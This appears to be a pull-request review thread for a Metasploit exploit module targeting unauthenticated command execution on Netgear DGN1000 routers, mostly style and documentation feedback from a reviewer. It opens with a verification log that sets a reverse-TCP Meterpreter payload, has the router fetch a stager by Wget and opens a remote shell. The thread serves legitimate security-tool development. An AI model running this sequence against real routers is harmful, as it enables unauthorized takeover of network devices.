Netgear DGN1000 Unauthenticated OS Command execution

[ghost]

This module exploits an unauthenticated OS command execution vulnerability, similar to https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb.

Verification

msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1
RHOST => 192.168.0.1
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80
RPORT => 80
msf exploit(netgear_dgn1000_setup_unauth_exec) > set LHOST eth0
LHOST = eth0
msf exploit(netgear_dgn1000_setup_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(netgear_dgn1000_setup_unauth_exec) > run

[*] Started reverse TCP handler on 192.168.0.11:4444
[*] 192.168.0.1:80 - Connecting to target...
[*] 192.168.0.1:80 - Exploiting target ....
[*] Using URL: http://0.0.0.0:8080/DnuJhOHYg7auIz
[*] Local IP: http://192.168.0.11:8080/DnuJhOHYg7auIz
[*] Client 192.168.0.1 (Wget) requested /DnuJhOHYg7auIz
[*] Sending payload to 192.168.0.1 (Wget)
[*] Sending stage (1073332 bytes) to 192.168.0.1
[*] Meterpreter session 2 opened (192.168.0.11:4444 -> 192.168.0.1:51558) at 2017-10-20 20:37:06 -0400
[*] Command Stager progress - 100.00% done (129/129 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.0.1
OS           :  (Linux 2.6.20-Amazon_SE)
Architecture : mips
Meterpreter  : mipsbe/linux
meterpreter >```

[h00die]

Theres an 'edb' reference: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb#L35

[h00die]

you should include Robort's email that is in the EDB module

[h00die]

if res && ...
always remember to check for res.

[h00die]

so if ANY site EVER has setup.cgi its detected? Is there any unique item on the page to check for, or a disclosed version number on any unuath pages?

[h00die]

single quotes

[h00die]

single quotes

[h00die]

cmd.to_s should work fine here instead of "#{cmd}"

[h00die]

single quotes

[h00die]

single quotes

[ghost]

shit! will fix immeidately. forgot to fix these ughh

[h00die]

remove a space?

[ghost]

Fixed requested changes

[ghost]

@h00die its weird, I keep adding the header yet the cli keeps marking it wrong.

[h00die]

The error I'm seeing is: modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb - [ERROR] Exploit is missing a disclosure date

[ghost]

Gotcha. Thank you! added it hopefully works

[h00die]

Anyone have this router to test with? If not, @realoriginal would you be able to send a pcap of the check and exploitation (sanitized if you wish) to msfdev@metasploit.com ?

[ghost]

Yes @h00die I will send a Pcap tommorow morning, is there a format which I should submit in the email, ie module name and stuff?

[h00die]

You can put the PR number (PR: #9106) but nothing formal is required. I'll know!

[ghost]

gotcha. Was able to do it, sent it in :D

[ghost]

Was able to submit a PCAP a few hours later, you may notice the localhost for both dest and source, its due to proxy. Hopefully doesnt affect much @h00die

[h00die]

This doesn't look to be the same finding.

[h00die]

['EDB', '25978']

[h00die]

just one last minor edit and it'll be ready to land!

[ghost]

fixed. :D

[h00die]

dont need this line anymore

[h00die]

sorry, one last (bigger) thing, need some module docs on here. See https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md as a close example

[ghost]

No problem. will bust em out rn.

[ghost]

Done @h00die

[h00die]

I did a few code cleanups: 210f6f8#diff-b29c8db7b12be9e30426bf7347cbd388 in the module added the default target and payload (per what you used). Cleaned up some spacing, and the module docs.

[h00die]

Thanks for submitting and all the quick turn arounds!

[h00die]

Release Notes

An exploit has been added for unauth RCE to netgear dgn1000 routers.

[ghost]

thank you sir!. Will make sure to have this all done for any future models so you guys have less of a headache xD. Appreciate it